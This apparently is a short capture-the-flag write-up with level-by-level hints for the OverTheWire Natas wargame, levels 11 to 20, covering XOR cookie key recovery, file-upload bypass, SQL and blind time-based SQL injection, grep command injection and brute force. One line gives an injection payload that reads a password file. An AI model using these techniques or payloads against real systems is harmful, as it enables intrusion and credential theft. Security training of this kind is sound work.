Overthewire : Natas : 11 - 20
Posted on

A brief writeup of solving the Overthewire War Game Natas, levels 11 through 20

10 ➜ 11

  • Well, some characters are escaped this time, but that's not enough to stop us
  • Try this '' /etc/natas_webpass/natas11 #

11 ➜ 12

  • The source code will tell you what algorithm is being used
  • That algorithm is susceptible to a plaintext attack
  • A XOR attack works like this
plaintext ⊕ key = encrypted_text
encrypted_text ⊕ plaintext = key
encrypted_text ⊕ key = plaintext
  • Find the key using the default data and the default cookie
  • Now modify the data as you need

12 ➜ 13

  • Notice what part isn't paid to attention to in the code
  • Manipulate the HTML to use that part to your advantage and simply print out the password
  • PHP will work

13 ➜ 14

  • Read about the function being used to validate the input data.
  • A list of file types and their initial bytes are available here
  • PHP to the rescue again...

14 ➜ 15

  • Straight-forward ______ injection

15 ➜ 16

  • Straight-forward ______ ______ injection
  • Remember, passwords consist of 32 alphanumeric characters
  • Fuzzy matching strings to specific patterns can require some specific words...
  • Very good write-up about blind SQL injection

16 ➜ 17

  • Fuzzy matching but this time with grep
  • $() to run commands is still allowed so let's take advantage of that
  • Find a word that exists in the file, say xyz. It has to be an absolute word.
  • Now the trick is to grep the password file for a part of the password, prepend it to the actual word and give the whole as an input.
  • If the grep returns something, the searched string would become abc\ xyz, something that doesn't exist in the actual file being queried using grep.
  • This one was a bit tricky, so feel free to spend a lot of time on it.

17 ➜ 18

  • You can see the query if debug=true but that won't be of much use.
  • PHP's mysql_result() doesn't really report any errors, just a boolean depending on if the query was executed successfully, no use since the result wasn't visible.
  • After a couple of trials, triggering time delays was the answer.
  • Be careful to monitor the status of the HTTP request instead of elapsed time.

18 ➜ 19

  • Two words, brute force...

19 ➜ 20

  • Well it isn't incremental now...
  • A lot of hit and trial with CyberChef, turns out it was a hex encoded ASCII string
  • Brute force again...
Table of Contents